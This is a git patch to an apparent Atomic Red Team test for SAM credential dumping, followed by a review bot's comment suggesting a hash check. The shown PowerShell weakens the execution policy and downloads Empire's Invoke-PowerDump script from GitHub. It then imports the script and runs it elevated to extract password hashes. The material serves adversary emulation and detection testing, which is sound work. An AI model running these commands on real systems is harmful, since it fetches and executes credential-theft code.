From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001
From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com>
Date: Tue, 18 May 2021 10:51:47 -0400
Subject: [PATCH] Fix file path for PowerDump Import (#1466)

seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp
---
 atomics/T1003.002/T1003.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 name: powershell
 elevation_required: true
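Review bot: The new `Import-Module "$Env:Temp\PowerDump.ps1"` line loads whatever is at that fixed path, whether or not the preceding `Invoke-Webrequest` succeeded, so a stale or modified copy left by an earlier run would be executed in an elevated session (`elevation_required: true`). The download URL is pinned to a commit, but nothing visible in the hunk checks the file on disk. Adding `-ErrorAction Stop` to the download and a check such as `if ((Get-FileHash "$Env:Temp\PowerDump.ps1" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256>') { throw 'PowerDump.ps1 hash mismatch' }` before the import would make the test fail closed. The command block starts above the hunk and no cleanup step is shown here, so it is also worth confirming that the test's cleanup removes `$Env:Temp\PowerDump.ps1` afterwards.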